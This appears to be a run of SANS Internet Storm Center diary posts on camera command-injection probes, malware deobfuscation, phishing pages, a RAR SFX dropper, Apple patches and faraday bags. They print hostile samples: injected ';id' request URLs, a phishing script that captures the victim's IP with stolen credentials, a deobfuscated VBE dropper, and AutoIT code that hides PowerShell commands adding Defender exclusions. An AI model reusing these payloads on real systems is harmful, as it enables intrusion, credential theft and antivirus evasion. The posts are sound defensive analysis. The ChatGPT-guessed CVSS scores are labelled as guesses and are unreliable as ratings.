| 2021-12-13 | /cgi-bin/mft/wireless_mft?ap=travesti;id                           |
| 2021-12-13 | /cgi-bin/mft/wireless_mft?ap=travesti;ipconfig                     |
| 2021-12-17 | /cgi-bin/mft/wireless_mft?ap=travesti;id                           |
| 2021-12-17 | /cgi-bin/mft/wireless_mft?ap=travesti;ipconfig                     |
| 2022-01-22 | /cgi-bin/mft/wireless_mft?ap=travesti;id                           |
| 2022-01-22 | /cgi-bin/mft/wireless_mft?ap=travesti;ipconfig                     |
| 2023-05-20 | /cgi-bin/mft/wireless_mft                                          |
| 2023-05-21 | /cgi-bin/mft/wireless_mft?ap=irrelevant;{payload}                  |
+------------+--------------------------------------------------------------------+

Back in 2015, CORE security released a very similar vulnerability in "Air Live" cameras [3][4]. Searching further shows that this vulnerability was also found in 2013 Zavio IP Cameras [5]. 

So this appears to be one of these all too common "IoT" security issues: The same firmware/hardware is being resold under different brands, and once a vendor fixes the flaw does in no way guarantee that other vendors selling the same equipment will even bother to look if they are vulnerable as well. ABUS likely is just the sales organization feeling zero responsibility to check if what they are selling is remotely fit to be connected to a network.

As a user of such a camera, you must ensure that you keep your firmware up to date and avoid exposing these cameras to the internet. And as ABUS puts it: "KEEP AN EYE ON EVERYTHING.", most notably your vendors.

[1] https://mobil.abus.com/usa/Commercial-Security/Industry-solutions/Campus-Security
[2] https://seclists.org/fulldisclosure/2023/Feb/16
[3] https://seclists.org/fulldisclosure/2015/Jul/29
[4] http://camera.airlive.com/
[5] https://www.exploit-db.com/exploits/25815

---

Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

This is part three of a diary entry series. Part one can be found here and part two can be found here.

We ended with the download of a new payload: a .bat file.

Let's take a look:

That looks like more BASE64 code. Let's check with base64dump.py:

Indeed, we have rather 2 long BASE64 strings. So maybe 2 payloads. Or a payload and a loader.

What do we find after the BASE64 code:

A BAT file with obfuscated commands. A lot of 3 letter strings between exclamation marks (!).

The one circled in red draws my attention: !tHB!. If I remove that string, I end up with .exe.

So I try a sed command to remove all occurence of 3 characters surrounded by exclamation marks. I do this with regular expression !...!

The result looks like another PowerShell script:

With more obfuscation: I have to remove string pCpCh too.

And we end up with another PowerShell script. It looks similar to the one we analyzed in part 2: another decryptor.

We are again dealing with AES encryption (1), CBC mode this time (2), the key is BASE64-encoded (3) and the initialisation vector too (4). And there is also GZIP decompression (5).

So let's adapt our decryption script from part 2 a bit:

from Crypto.Cipher import AES
import gzip
from Crypto.Util.Padding import pad, unpad

def Transform(items, options):
    if options.parameter == '2':
        ciphertext = items[1]['content']
    else:
        ciphertext = items[0]['content']
    key = items[2]['content']
    iv = items[3]['content']

    oAES = AES.new(key, AES.MODE_CBC, iv)
    cleartext = unpad(oAES.decrypt(ciphertext), AES.block_size)
    transformed = gzip.decompress(cleartext)

    return transformed

There are several differences here: we use CBC mode, we have an initialisation vector (iv), and we have to do unpadding (unpad).

And since we have 2 payloads to decrypt this time, we use myjson-transform.py's option -p (--paramter) to specify which payload we want to decrypt.

If -p is equal to '2', we take the second payload (items[1]), otherwise we take the first payload (items[0]).

This is the output from base64dump.py:

We have our 2 payloads, the key and the iv.

We let base64dump.py produce JSON output and feed this into myjson-transform.py with decrypt-2.py script. As I suspect that this payload will be binary (PE file), I do an ASCII dump (-A) of the decrypted data:

This looks indeed like a PE file. Let's verify with my pecheck.py tool:

It's a .NET assembly: 5c5f55987a79e29a3bc46aeeb78209331d6cdbb4d1dde7f24a0b41ae51b5de8f.

Let's take a look at the second payload, using -p 2:

That one too is a .NET assembly: 5f5b1e4a6cb96f0611a8374e504cee8ceb7dc59dedf0f4059fd93dcd8315699c.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

While reviewing my last findings today, I found a phishing email that delivered a classic .shtml file called "PROFORMA INVOICE.shtml". Right now, nothing special, emails like this one are widespread. When you open the file in a sandbox, it reveals a classic form:

The potential victim is asked to enter his/her M365 credentials to reveal the Excel sheet (the email address has been obfuscated). I had a quick look at the HTML code and found something interesting in the HTTP form:

<input type="hidden" name="ip" id="hIP">

This means that a variable called "ip" will be submitted to the form simultaneously with the credentials. While checking deeper, there was some obfuscated JavaScript code below in the code:

<script>
    const getip = async () => {
        const payl = await postData("https://api.ipify.org/?format=json", {}, "GET");
        document.getElementById("hIP").value = payl.ip;
        return payl.ip;
    }
    getip();
    async function postData(url = '', data = {}, method="POST") {
        const response = await fetch(url, {
            method, 
            mode: 'cors', 
            cache: 'no-cache', 
            headers: {
                'Content-Type': 'application/json'
            },
            body: (method.toLowerCase() === "post") ? JSON.stringify(data) : null
        });
        return response.json(); // parses JSON response into native JavaScript objects
    }
</script>

The line in red assigns the victim's public IP address to hIP that will be exfiltrated with the credentials.

Note that this piece of JavaScript is a perfect example of how to contact an API and extract data from the JSON response!

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

 

A reader contacted us (thank you, Scott) to share an interesting phishing email. We are always looking for fresh meat, don't hesitate to share your samples with us! I had a look at the EML file provided by Scott, and it looked indeed weird. 

When you open the mail in Outlook, it looks like this:

You could think that first reflex, this is a phishing campaign targeting Chinese people. If we look a bit deeper, we see that the document is lacking any "format" (paragraphs, carriage returns, ...), and there are here and there "emoticons". This looks definitively like an encoding problem.

If you check the raw EML file, there is this piece of code at the beginning of the mail body:

<=00m=00e=00t=00a=00 =00h=00t=00t=00p=00-=00e=00q=00u=00i=00v=00=3D=00"=00C=
=00o=00n=00t=00e=00n=00t=00-=00T=00y=00p=00e=00"=00 =00c=00o=00n=00t=00e=00=
n=00t=00=3D=00"=00t=00e=00x=00t=00/=00h=00t=00m=00l=00;=00 =00c=00h=00a=00r=
=00s=00e=00t=00=3D=00u=00t=00f=00-=001=006=00"=00>=00<html><head><meta http=
-equiv=3D"Content-Type" content=3D"text/html; charset=3Dunicode">
=20
<meta http-equiv=3D"X-UA-Compatible" content=3D"IE=3Dedge"> <title></title>=
</head>=20
<body>

Export the body and open it in a text editor, you will get:

As you can see, the attacker messed up the encoding, and Outlook cannot display the mail body correctly. Here is what should be displayed:

Note that the attackers not only messed up with the encoding, they also messed up the variable replacement with correct values ("[EMail]", "[Date_short]", ...).

The link points to a Java RAT stored on the Discord CDN[1]. The RAT connects to its C2 server via magicfinger[.]ddns[.]net

[1] https://bazaar.abuse.ch/sample/d7b24068f673031c8c27271bf36790f9468b8c27ec08c51a348fc08c34ff6881/

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

Today, Apple released macOS, iOS, iPadOS, tvOS, watchOS, and Safari updates.

Three of the vulnerabilities are already exploited in the wild. Combining the three vulnerabilities, an attacker can gain complete system access as the user visits a malicious website. CVE-2023-32373 allows for arbitrary code execution as WebKit processes malicious content. CVE-2023-32409, in turn, enables breaking out of the web content sandbox, completing the full system compromise. The vulnerabilities are not indicated as "patched" for older versions of macOS, but they are covered in the Safari update, which applies the patch to older versions of macOS.

As usual, Apple's vulnerability descriptions are terse. As promised in a prior diary, I let ChatGPT "guess" the CVSS score for these updates. Let me know if you agree or not. The rating (moderate/important/critical) are mine. ChatGPT refused to provide a CVSS score for some vulnerabilities based on insufficient information. Let me know if you feel ChatGPT did ok or not (or if it is worthwhile keeping these ChatGPT CVSS scores or not)

Safari 16.5	watchOS 9.5	tvOS 16.5	iOS 16.5 and iPadOS 16.5	iOS 15.7.6 and iPadOS 15.7.6	macOS Big Sur 11.7.7	macOS Ventura 13.4	macOS Monterey 12.6.6
CVE-2023-32402 [moderate] ChatGPT-CVSS: 4.3 WebKit An out-of-bounds read was addressed with improved input validation. Processing web content may disclose sensitive information
x	x	x	x			x
CVE-2023-32423 [moderate] ChatGPT-CVSS: 5.3 WebKit A buffer overflow issue was addressed with improved memory handling. Processing web content may disclose sensitive information
x	x	x	x			x
CVE-2023-32409 [moderate] ChatGPT-CVSS: 8.8 *** EXPLOITED *** WebKit The issue was addressed with improved bounds checks. A remote attacker may be able to break out of Web Content sandbox. Apple is aware of a report that this issue may have been actively exploited.
x	x	x	x			x
CVE-2023-28204 [moderate] ChatGPT-CVSS: 7.5 *** EXPLOITED *** WebKit An out-of-bounds read was addressed with improved input validation. Processing web content may disclose sensitive information. Apple is aware of a report that this issue may have been actively exploited.
x	x	x	x	x		x
CVE-2023-32373 [critical] ChatGPT-CVSS: 8.8 *** EXPLOITED *** WebKit A use-after-free issue was addressed with improved memory management. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.
x	x	x	x	x		x
CVE-2023-32388 [important] ChatGPT-CVSS: N/A Accessibility A privacy issue was addressed with improved private data redaction for log entries. An app may be able to bypass Privacy preferences
	x		x	x	x	x	x
CVE-2023-32400 [moderate] ChatGPT-CVSS: N/A Accessibility This issue was addressed with improved checks. Entitlements and privacy permissions granted to this app may be used by a malicious app
	x		x			x
CVE-2023-32399 [important] ChatGPT-CVSS: 4.3 Core Location The issue was addressed with improved handling of caches. An app may be able to read sensitive location information
	x	x	x			x
CVE-2023-28191 [important] ChatGPT-CVSS: N/A AppleEvents This issue was addressed with improved redaction of sensitive information. An app may be able to bypass Privacy preferences
	x	x	x		x	x	x
CVE-2023-32417 [moderate] ChatGPT-CVSS: 4.0 Face Gallery This issue was addressed by restricting options offered on a locked device. An attacker with physical access to a locked Apple Watch may be able to view user photos or contacts via accessibility features
	x
CVE-2023-32392 [important] ChatGPT-CVSS: 4.3 GeoServices A privacy issue was addressed with improved private data redaction for log entries. An app may be able to read sensitive location information
	x	x	x		x	x	x
CVE-2023-32372 [important] ChatGPT-CVSS: 5.3 ImageIO An out-of-bounds read was addressed with improved input validation. Processing an image may result in disclosure of process memory
	x	x	x			x
CVE-2023-32384 [critical] ChatGPT-CVSS: 7.8 ImageIO A buffer overflow was addressed with improved bounds checking. Processing an image may lead to arbitrary code execution
	x	x	x	x	x	x	x
CVE-2023-32354 [important] ChatGPT-CVSS: 7.5 IOSurfaceAccelerator An out-of-bounds read was addressed with improved input validation. An app may be able to disclose kernel memory
	x	x	x
CVE-2023-32420 [moderate] ChatGPT-CVSS: 7.5 IOSurfaceAccelerator An out-of-bounds read was addressed with improved input validation. An app may be able to cause unexpected system termination or read kernel memory
	x	x	x			x
CVE-2023-27930 [important] ChatGPT-CVSS: 8.8 Kernel A type confusion issue was addressed with improved checks. An app may be able to execute arbitrary code with kernel privileges
	x	x	x			x
CVE-2023-32398 [important] ChatGPT-CVSS: 8.8 Kernel A use-after-free issue was addressed with improved memory management. An app may be able to execute arbitrary code with kernel privileges
	x	x	x	x	x	x	x
CVE-2023-32413 [important] ChatGPT-CVSS: 8.8 Kernel A race condition was addressed with improved state handling. An app may be able to gain root privileges
	x	x	x	x	x	x	x
CVE-2023-32352 [important] ChatGPT-CVSS: 7.0 LaunchServices A logic issue was addressed with improved checks. An app may bypass Gatekeeper checks
	x		x		x	x	x
CVE-2023-32407 [important] ChatGPT-CVSS: N/A Metal A logic issue was addressed with improved state management. An app may be able to bypass Privacy preferences
	x	x	x	x	x	x	x
CVE-2023-32368 [important] ChatGPT-CVSS: 6.5 Model I/O An out-of-bounds read was addressed with improved input validation. Processing a 3D model may result in disclosure of process memory
	x	x	x			x	x
CVE-2023-32403 [important] ChatGPT-CVSS: 4.3 NetworkExtension This  issue was addressed with improved redaction of sensitive information. An app may be able to read sensitive location information
	x	x	x	x	x	x	x
CVE-2023-32390 [moderate] ChatGPT-CVSS: 4.3 Photos The issue was addressed with improved checks. Photos belonging to the Hidden Photos Album could be viewed without authentication through Visual Lookup
	x		x			x
CVE-2023-32357 [moderate] ChatGPT-CVSS: 7.0 Sandbox An authorization issue was addressed with improved state management. An app may be able to retain access to system configuration files even after its permission is revoked
	x	x	x		x	x	x
CVE-2023-32391 [moderate] ChatGPT-CVSS: N/A Shortcuts The issue was addressed with improved checks. A shortcut may be able to use sensitive data with certain actions without prompting the user
	x		x	x		x
CVE-2023-32404 [important] ChatGPT-CVSS: 6.2 Shortcuts This issue was addressed with improved entitlements. An app may be able to bypass Privacy preferences
	x		x			x
CVE-2023-32394 [moderate] ChatGPT-CVSS: 5.3 Siri The issue was addressed with improved checks. A person with physical access to a device may be able to view contact information from the lock screen
	x	x	x			x
CVE-2023-32376 [important] ChatGPT-CVSS: 7.0 StorageKit This issue was addressed with improved entitlements. An app may be able to modify protected parts of the file system
	x	x	x			x
CVE-2023-28202 [moderate] ChatGPT-CVSS: N/A System Settings This issue was addressed with improved state management. An app firewall setting may not take effect after exiting the Settings app
	x	x	x			x
CVE-2023-32412 [moderate] ChatGPT-CVSS: 7.8 Telephony A use-after-free issue was addressed with improved memory management. A remote attacker may be able to cause unexpected app termination or arbitrary code execution
	x	x	x	x	x	x	x
CVE-2023-32408 [important] ChatGPT-CVSS: 7.5 TV App The issue was addressed with improved handling of caches. An app may be able to read sensitive location information
	x	x	x	x		x	x
CVE-2023-32389 [important] ChatGPT-CVSS: 7.5 Wi-Fi This  issue was addressed with improved redaction of sensitive information. An app may be able to disclose kernel memory
	x	x	x			x
CVE-2023-32411 [important] ChatGPT-CVSS: 6.5 AppleMobileFileIntegrity This issue was addressed with improved entitlements. An app may be able to bypass Privacy preferences
		x	x		x	x	x
CVE-2023-32422 [moderate] ChatGPT-CVSS: 6.5 SQLite This issue was addressed by adding additional SQLite logging restrictions. An app may be able to access data from other apps by enabling additional SQLite logging
		x	x			x
CVE-2023-32415 [important] ChatGPT-CVSS: 5.3 Weather This  issue was addressed with improved redaction of sensitive information. An app may be able to read sensitive location information
		x	x			x
CVE-2023-32371 [important] ChatGPT-CVSS: 6.5 Associated Domains The issue was addressed with improved checks. An app may be able to break out of its sandbox
			x			x
CVE-2023-32419 [moderate] ChatGPT-CVSS: 8.8 Cellular The issue was addressed with improved bounds checks. A remote attacker may be able to cause arbitrary code execution
			x
CVE-2023-32385 [moderate] ChatGPT-CVSS: 4.3 PDFKit A denial-of-service issue was addressed with improved memory handling. Opening a PDF file may lead to unexpected app termination
			x			x
CVE-2023-32365 [moderate] ChatGPT-CVSS: N/A Photos The issue was addressed with improved checks. Shake-to-undo may allow a deleted photo to be re-surfaced without authentication
			x	x
CVE-2023-32367 [important] ChatGPT-CVSS: 7.5 Security This issue was addressed with improved entitlements. An app may be able to access user-sensitive data
			x			x
CVE-2023-23532 [important] ChatGPT-CVSS: 7.0 Apple Neural Engine This issue was addressed with improved checks. An app may be able to break out of its sandbox
				x
CVE-2023-28181 [important] ChatGPT-CVSS: 9.8 CoreCapture The issue was addressed with improved memory handling. An app may be able to execute arbitrary code with kernel privileges
				x	x
CVE-2023-32410 [important] ChatGPT-CVSS: 7.5 IOSurface An out-of-bounds read was addressed with improved input validation. An app may be able to leak sensitive kernel state
				x	x	x	x
CVE-2023-27940 [moderate] ChatGPT-CVSS: 4.0 Kernel The issue was addressed with additional permissions checks. A sandboxed app may be able to observe system-wide network connections
				x		x	x
CVE-2023-32397 [important] ChatGPT-CVSS: 6.5 Shell A logic issue was addressed with improved state management. An app may be able to modify protected parts of the file system
				x	x	x	x
CVE-2023-32386 [moderate] ChatGPT-CVSS: 5.0 Contacts A privacy issue was addressed with improved handling of temporary files. An app may be able to observe unprotected user data
					x	x	x
CVE-2023-32360 [moderate] ChatGPT-CVSS: 6.5 CUPS An authentication issue was addressed with improved state management. An unauthenticated user may be able to access recently printed documents
					x	x	x
CVE-2023-32387 [moderate] ChatGPT-CVSS: 8.8 dcerpc A use-after-free issue was addressed with improved memory management. A remote attacker may be able to cause unexpected app termination or arbitrary code execution
					x	x	x
CVE-2023-27945 [moderate] ChatGPT-CVSS: 4.3 Dev Tools This issue was addressed with improved entitlements. A sandboxed app may be able to collect system logs
					x		x
CVE-2023-32369 [important] ChatGPT-CVSS: 6.5 libxpc A logic issue was addressed with improved state management. An app may be able to modify protected parts of the file system
					x	x	x
CVE-2023-32405 [important] ChatGPT-CVSS: 7.8 libxpc A logic issue was addressed with improved checks. An app may be able to gain root privileges
					x	x	x
CVE-2023-32380 [critical] ChatGPT-CVSS: 8.8 Model I/O An out-of-bounds write issue was addressed with improved bounds checking. Processing a 3D model may lead to arbitrary code execution
					x	x	x
CVE-2023-32382 [important] ChatGPT-CVSS: 5.3 Model I/O An out-of-bounds read was addressed with improved input validation. Processing a 3D model may result in disclosure of process memory
					x	x	x
CVE-2023-32355 [important] ChatGPT-CVSS: 7.5 PackageKit A logic issue was addressed with improved state management. An app may be able to modify protected parts of the file system
					x	x	x
CVE-2023-32395 [important] ChatGPT-CVSS: 7.0 Perl A logic issue was addressed with improved state management. An app may be able to modify protected parts of the file system
					x	x	x
CVE-2023-32414 [important] ChatGPT-CVSS: 4.0 DesktopServices The issue was addressed with improved checks. An app may be able to break out of its sandbox
						x
CVE-2023-32375 [important] ChatGPT-CVSS: 7.5 Model I/O An out-of-bounds read was addressed with improved input validation. Processing a 3D model may result in disclosure of process memory
						x	x
CVE-2023-32363 [important] ChatGPT-CVSS: 0 Screen Saver A permissions issue was addressed by removing vulnerable code and adding additional checks. An app may be able to bypass Privacy preferences
						x
CVE-2023-23535 [important] ChatGPT-CVSS: 7.5 ImageIO The issue was addressed with improved memory handling. Processing a maliciously crafted image may result in disclosure of process memory
							x

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

A week ago, I wrote about Google starting to offer ".zip" domains and the possible risks associated with this [1]. Earlier today, I quickly surveyed registered .zip domains to see what people are doing with them. 

I found a total of 2,753 domains with content. Out of these files, I was able to categorize 1,928. The remaining is still a work in progress.

So far, most domains are "Parked" (1,506). This is typical for new domains displaying a registrar default page until the owner configures content. 229 of the domains are showing various errors. I classified 143 domains as harmless, meaning they link to different other pages that, as far as I can tell, do not provide malicious content. Some "harmless" sites appear registered by security companies or individuals either directing to their page or displaying messages warning about the .zip TLD issues. A few of the pages do, for example, direct to individual LinkedIn profiles.

48 domains direct to Rick Astley ("rickrolling") content or similar videos mostly meant to annoy visitors.

So far, I only found one domain that I consider "suspect": fermwartung[.]zip ("Fernwartung" is the German word for Remote Maintenance). It directs to what looks like a legitimate company's webpage, but the download triggers some suspicious signatures on Virustotal [2]. I am unfamiliar with the company, but according to the web page, they appear to be an IT service provider. It is possible that their remote assistance tool triggers some Anti-Virus warnings.

sentineloneinstaller[.]zip appeared to be advertising Norton Anti-Virus. Currently, the website is down, so I cannot verify if it attempted to play the "fake anti-virus" game.

This is still a work in progress, and I will update this story as I can classify more domains. The classification is based on keywords, so I will surely miss something. Let me know if you find an "interesting" (malicious) .zip domain.

A couple of sites offered online compression/decompression of zip files. There is an obvious risk here that, first of all, the file's content may be leaked, and secondly, the file you get back may be altered. But this is not specific to the ".zip" TLD, and I classified these sites as "harmless" for now.

One site displayed a login form. But I suspect this was just a login form for the site's admin interface. It did not resemble a brand I recognized and only asked for a password, not a username.

[1] https://isc.sans.edu/diary/The+zip+gTLD+Risks+and+Opportunities/29838/
[2] https://www.virustotal.com/gui/file/06298771950708c66951149af0962079c260e08d9eb536a17d9c5f54c0d888a7

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

This isn't a new attack vector, but I’ve found many malicious RAR SFX files in the wild for a few weeks. An “SFX” file is a self-extracting archive that contains compressed files and is wrapped up with some executable code to decompress them on the fly. The final user receives an executable file (PE file) that can be launched with the need to install a specific tool to decompress the content.  This technique has been used for a while by attackers, and even more interesting, the self-decompression routine can launch any executable (another executable, a script, …)[1]

Most of the time, these files aren’t detected as a known threat because payloads (the files) are compressed (sometimes encrypted too - if a password is used). But they are generally detected as “suspicious”. I wrote a simple YARA rule to detect such files:

rule SelfExtractingRAR
{
    meta:
        description = "Detects an SFX archive with automatic script execution”
        author = “Xavier “Mertens <xmertens@isc.sans.edu>”
    
    strings:
        $exeHeader = "MZ"
        $rarHeader = "Rar!" wide ascii
        $sfxSignature = "SFX" wide ascii
        $sfxSetup = "Setup=" wide ascii

    condition:
       $exeHeader at 0 and $rarHeader and $sfxSignature and $sfxSetup
}

Here is an example of such SFX file that I spotted yesterday. The file was delivered through a phishing campaign and was called "USD 1,810,500.exe” with the following SHA256: e08a8ff9fadce5026127708c57b363bd0b2217a0a96d9ba4e7994601ad1a8963[2]. A good point with such files is that you don’t need to execute them to extract the content. A classic rar command will do the job:

remnux@remnux:/MalwareZoo/20230516$ rar t "USD 1,810,500.exe"

RAR 5.50   Copyright (c) 1993-2017 Alexander Roshal   11 Aug 2017
Trial version             Type 'rar -?' for help

Testing archive USD 1,810,500.exe

1ktZ3RF93vZq427h3lvsYTk434w53G56ek6xCJ
SILENT= 144k80p185MQ7FN1
sF7Yy34s49U9R76Rku09Q0L19P
Setup=wscript Update-sk.s.vbe
q2X4nb8h8ay8003mjTM3W41S2Q77ssEIDH7zXpA
Path=%homedrive%\pxbc
TDaTWZ41l2f4d80XMx97NB5C298bdY
Update=U 06646163K1p2p66F
67562az6K38H90tYJgQTx963kZWMg

Testing     vicmmge.buj                                               OK 
Testing     uhupfsx.xml                                               OK 
Testing     kmpxxcxmlq.docx                                           OK 
Testing     Update-sk.s.vbe                                           OK 
Testing     pxqic.pif                                                 OK 
Testing     fpss.msc                                                  OK 
Testing     epmtilluig.xml                                            OK 
Testing     psxgfd.icm                                                OK 
Testing     pprwvki.ppt                                               OK 
Testing     qcrk.xls                                                  OK 
Testing     ppldgtbkm.xml                                             OK 
Testing     loffd.mp3                                                 OK 
Testing     wfsdrusej.icm                                             OK 
Testing     utmkbkhe.jpg                                              OK 
Testing     lhuhm.docx                                                OK 
Testing     jcftejksj.xls                                             OK 
Testing     nkeej.xl                                                  OK 
Testing     wtnjesas.pdf                                              OK 
Testing     riaam.txt                                                 OK 
Testing     clff.pdf                                                  OK 
Testing     rnovsgsm.txt                                              OK 
Testing     gcprhnl.xls                                               OK 
Testing     lhulocrs.xls                                              OK 
Testing     bxmrh.msc                                                 OK 
Testing     xsdmudolb.xml                                             OK 
Testing     xppwqdiutn.jpg                                            OK 
Testing     eleuutbq.ppt                                              OK 
Testing     cttrdjfv.xml                                              OK 
Testing     ccgjrkh.ini                                               OK 
Testing     lpuukd.icm                                                OK 
Testing     eetv.exe                                                  OK 
Testing     sqtu.docx                                                 OK 
Testing     uvkmtkcrvq.icm                                            OK 
Testing     efitdtqci.bmp                                             OK 
Testing     ruvjtenq.mp3                                              OK 
Testing     wucrjivio.pdf                                             OK 
Testing     bhbeq.icm                                                 OK 
Testing     waemwttb.pdf                                              OK 
Testing     wfhesiw.xml                                               OK 
Testing     sxvkks.xls                                                OK 
Testing     negbxaqdr.msc                                             OK 
Testing     wmlpuwiwdd.ini                                            OK 
Testing     vged.msc                                                  OK 
Testing     pmevdiqiww.ppt                                            OK 
Testing     gwrtofbgi.mp3                                             OK 
Testing     kejrxfveni.jpg                                            OK 
Testing     bnubxgq.pdf                                               OK 
Testing     bdldxj.msc                                                OK 
Testing     hnbfjb.icm                                                OK 
Testing     tpshh.xml                                                 OK 
Testing     exdsgg.icm                                                OK 
Testing     jmwnkkmc.icm                                              OK 
Testing     bkmlgvggjq.xml                                            OK 
Testing     mqen.bin                                                  OK 
Testing     inxwfoap.dll                                              OK 
Testing     qxskgk.ppt                                                OK 
Testing     etiwhseh.txt                                              OK 
Testing     gvgbbm.mp3                                                OK 
Testing     duacabnhh.txt                                             OK 
Testing     blcvjevx.msc                                              OK 
Testing     xjwwawkp.msc                                              OK 
Testing     jfbbaim.dat                                               OK 
Testing     xksrkjuj.exe                                              OK 
Testing     dndafdxcs.docx                                            OK 
Testing     cauhoxnn.bmp                                              OK 
Testing     adtp.icm                                                  OK 
Testing     miwvkhxw.xml                                              OK 
Testing     dtmisespef.pdf                                            OK 
Testing     dntdl.xls                                                 OK 
Testing     pmibtqovo.bin                                             OK 
Testing     jjbilmi.xls                                               OK 
Testing     hspofc.xml                                                OK 
Testing     wniu.ppt                                                  OK 
Testing     ugrjeq.xls                                                OK 
Testing     trgwpgvg.msc                                              OK 
Testing     meul.exe                                                  OK 
Testing     ejlmpu.dll                                                OK 
Testing     jnjvc.xml                                                 OK 
Testing     okmsufva.ppt                                              OK 
Testing     urgqtjbjdv.xml                                            OK 
Testing     mbojgfvxl.ini                                             OK 
All OK

The purpose of the files was to create some trust in the archive. But most of the files contain garbage data. Here are the only interesting ones:

remnux@remnux:/MalwareZoo/20230516/out$ file * | grep -v "UTF-8"
kmpxxcxmlq.docx: Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
pxqic.pif:       PE32 executable (GUI) Intel 80386, for MS Windows
uhupfsx.xml:     ASCII text, with CRLF line terminators
Update-sk.s.vbe: Little-endian UTF-16 Unicode text, with CRLF line terminators
vicmmge.buj:     ASCII text, with very long lines, with no line terminators

The interesting information is returned when you test the archive (see above):

Setup=wscript Update-sk.s.vbe
Path=%homedrive%\pxbc

Files will be extracted in the 'C:\pxbc' (if the victim has rights to do it) and the script ‘Update-sk.s.vbe’ will be executed.

The script is nicely obfuscated. It’s encoded In UTL-16 LE, and the code is polluted with many comments with a lot of Chinese characters. Here is a decoded version:

remnux@remnux://MalwareZoo/20230516/out$ iconv -c -f UTF-16LE -t ASCII Update-sk.s.vbe | grep -v "^'"
on error resume next
o_j_no
fvxnvbahlwqjenu = "kmpxxcxmlq.docx"
wckwqfuoxpx = StrReverse("fip.ciqxp")
hknghkuuktxdvfx = hotbnrfdsuedk("llehS.tpircSW") 
Set obxigdixuharkko = WScript.CreateObject(hknghkuuktxdvfx )
xwduhpaha = wckwqfuoxpx + " " + fvxnvbahlwqjenu
obxigdixuharkko.Run xwduhpaha
function hotbnrfdsuedk(senlukbqxmcs)
hotbnrfdsuedk = StrReverse(senlukbqxmcs)
End function
Sub o_j_no
o_j_no = execute (StrReverse(peelS.tpircSW) + "4000")
End Sub
Sub twvrtegjxowwq(VAR)
twvrtegjxowwq = StrReverse(VAR)
End Sub

This VBS script is easy to understand. It will:

1. Wait for 4 seconds
2. Create a WScript.Shell object
3. Run the command “pxqic.pif kmpxxcxmlq.docx”

The .pif file is an AutoIT-compiled script that will execute the file's content passed as an argument. The file is also encoded and obfuscated. It contains a malicious PowerShell script. Here is how to extract it easily:

remnux@remnux:/MalwareZoo/20230516/out$ cat kmpxxcxmlq.docx | \
iconv -f UTF-16LE -t ASCII -c | \
sed -n '/\#ce/,/\#cs/p' kmpxxcxmlq.docx.out | \
grep -v '^[#|;]'

I did not publish the decode PowerShell script here because it's too big. The script is used as an anti-VM and anti-debugging script. It prevents Microsoft Defender from scanning some files and directories:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -Command Add-MpPreference -ExclusionProcess 'RegSvcs.exe'
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionProcess RegSvcs.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\pxbc
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -Command Add-MpPreference -ExclusionExtension '.vbs'
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -Command Add-MpPreference -ExclusionExtension '.vbe'
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionExtension .vbe

Here is the code responsible for this:

Func AntiVirus()
    $owmi = ObjGet("winmgmts:\\localhost\root\SecurityCenter2")
    $colitems = $owmi.execquery("Select * from AntiVirusProduct")
    For $objantivirusproduct In $colitems
        $usb = $objantivirusproduct.displayname
    Next
    Return $usb
EndFunc

Func Disabler()
    if AntiVirus() = "Windows Defender" Then
        ;#RequireAdmin
        ShellExecute("powershell"," -Command Add-MpPreference -ExclusionPath " & @ScriptDir,"","",@SW_HIDE)
        ShellExecute("powershell"," powershell -Command Add-MpPreference -ExclusionProcess 'RegSvcs.exe'","","",@SW_HIDE)
        ShellExecute("powershell"," powershell -Command Add-MpPreference -ExclusionExtension '.vbs'","","",@SW_HIDE)
        ShellExecute("powershell"," powershell -Command Add-MpPreference -ExclusionExtension '.vbe'","","",@SW_HIDE)
        ShellExecute("powershell"," powershell -Command Add-MpPreference -ExclusionExtension '*.vbs'","","",@SW_HIDE)
        ShellExecute("powershell"," powershell -Command Add-MpPreference -ExclusionExtension '*.vbe'","","",@SW_HIDE)
    ;EndIf
endFunc

The PowerShell also has a shellcode; it reads data from another obfuscated file. I still need more time to go deeper...

Finally, the .pif executable launches a 'RegSvcs.exe' and performs more code injection on it:

[1] https://www.rarlab.com/vuln_sfx_html.htm
[2] https://bazaar.abuse.ch/sample/e08a8ff9fadce5026127708c57b363bd0b2217a0a96d9ba4e7994601ad1a8963/

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

There are situations where it is desired to block signals between devices. Commonly scenarios are when traveling, in a location of uncertain safety, or otherwise concerned with data privacy and geolocation. I was curious how well a faraday bags and similar products protected wireless communications. A more common purchase these days are wallets that can help to protect against RFID skimming of credit card data [1].

Here were the scenarios tested using some faraday bags (Haftigts) [2] and in some cases a Flipper Zero [3]:

Wireless Communications	Scenario / Device
125 kHz RFID	HID proximity card, read with Flipper Zero [4] HID proximity fob, read with Flipper Zero
NFC	Credit Card, read with Flipper Zero [5]
Bluetooth	Phone in bag and bluetooth earbuds
WiFi (802.11)	Phone in bag used as hotspot, laptop connected to hotspot
Celluar	Phone in bag, another cellular phone used to call it

Extensive testing was done done using a variety of faraday bags and devices.

Scenario	Testing Process
HID proximity card	HID proximity card placed into bag Bag closed and sealed Flipper Zero placed on top of bag over card location Flipper Zero used to read 125 kHz RFID data
HID proximity fob	HID proximity fob placed into bag Bag closed and sealed Flipper Zero placed on top of bag over card location Flipper Zero used to read 125 kHz RFID data
